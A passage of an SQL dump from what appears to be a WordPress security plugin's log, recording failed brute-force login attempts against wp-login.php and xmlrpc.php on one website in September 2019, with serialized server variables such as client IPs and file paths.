Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"167.71.175.204\";s:11:\"REMOTE_PORT\";s:5:\"44316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA4DWkPXSyJlCUJQmpL4AAAAYA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568684046.0892\";s:12:\"REQUEST_TIME\";s:10:\"1568684046\";}}','notice','2019-09-17 01:34:07','2019-09-17 01:34:06',18259464,19558584,'https://bintara.com.my/xmlrpc.php',1,0,'167.71.175.204'),(24338,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"57822\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA4W2kPXSyJlCUJQmpMCQAAAZM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568684124.0273\";s:12:\"REQUEST_TIME\";s:10:\"1568684124\";}}','notice','2019-09-17 01:35:25','2019-09-17 01:35:24',17742848,19234872,'https://bintara.com.my/wp-login.php',1,0,'164.39.7.99'),(24339,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"164.39.7.99\";s:11:\"REMOTE_PORT\";s:5:\"58686\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA4XtK-omY048@iBsMkaQAAAMk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568684126.917\";s:12:\"REQUEST_TIME\";s:10:\"1568684126\";}}','notice','2019-09-17 01:35:28','2019-09-17 01:35:27',18260840,19560784,'https://bintara.com.my/xmlrpc.php',1,0,'164.39.7.99'),(24340,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"41034\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA9xGkPXSyJlCUJQmpPxwAAAYE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568685508.225\";s:12:\"REQUEST_TIME\";s:10:\"1568685508\";}}','notice','2019-09-17 01:58:29','2019-09-17 01:58:28',17741208,19232888,'https://bintara.com.my/wp-login.php',1,0,'50.63.167.184'),(24341,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"50.63.167.184\";s:11:\"REMOTE_PORT\";s:5:\"41464\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA9x2kPXSyJlCUJQmpPyAAAAZU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568685511.2256\";s:12:\"REQUEST_TIME\";s:10:\"1568685511\";}}','notice','2019-09-17 01:58:32','2019-09-17 01:58:31',18259776,19558336,'https://bintara.com.my/xmlrpc.php',1,0,'50.63.167.184'),(24342,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"88\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"59316\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA@BmkPXSyJlCUJQmpP3wAAAZA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568685574.9801\";s:12:\"REQUEST_TIME\";s:10:\"1568685574\";}}','notice','2019-09-17 01:59:36','2019-09-17 01:59:35',17743056,19233200,'https://bintara.com.my/wp-login.php',1,0,'178.128.68.121'),(24343,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"178.128.68.121\";s:11:\"REMOTE_PORT\";s:5:\"59976\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYA@CtK-omY048@iBsMlvgAAAMQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568685578.1803\";s:12:\"REQUEST_TIME\";s:10:\"1568685578\";}}','notice','2019-09-17 01:59:39','2019-09-17 01:59:38',18259272,19557944,'https://bintara.com.my/xmlrpc.php',1,0,'178.128.68.121'),(24344,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"89\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"51908\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBAzA99C9j9bhK9KplBwwAAAQ0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568686284.988\";s:12:\"REQUEST_TIME\";s:10:\"1568686284\";}}','notice','2019-09-17 02:11:27','2019-09-17 02:11:25',17741408,19232160,'https://bintara.com.my/wp-login.php',1,0,'94.23.32.126'),(24345,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"94.23.32.126\";s:11:\"REMOTE_PORT\";s:5:\"52466\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBA0B@uZ4OC5N1Fn8E23wAAAIA\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568686288.597\";s:12:\"REQUEST_TIME\";s:10:\"1568686288\";}}','notice','2019-09-17 02:11:30','2019-09-17 02:11:29',18259400,19556128,'https://bintara.com.my/xmlrpc.php',1,0,'94.23.32.126'),(24346,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 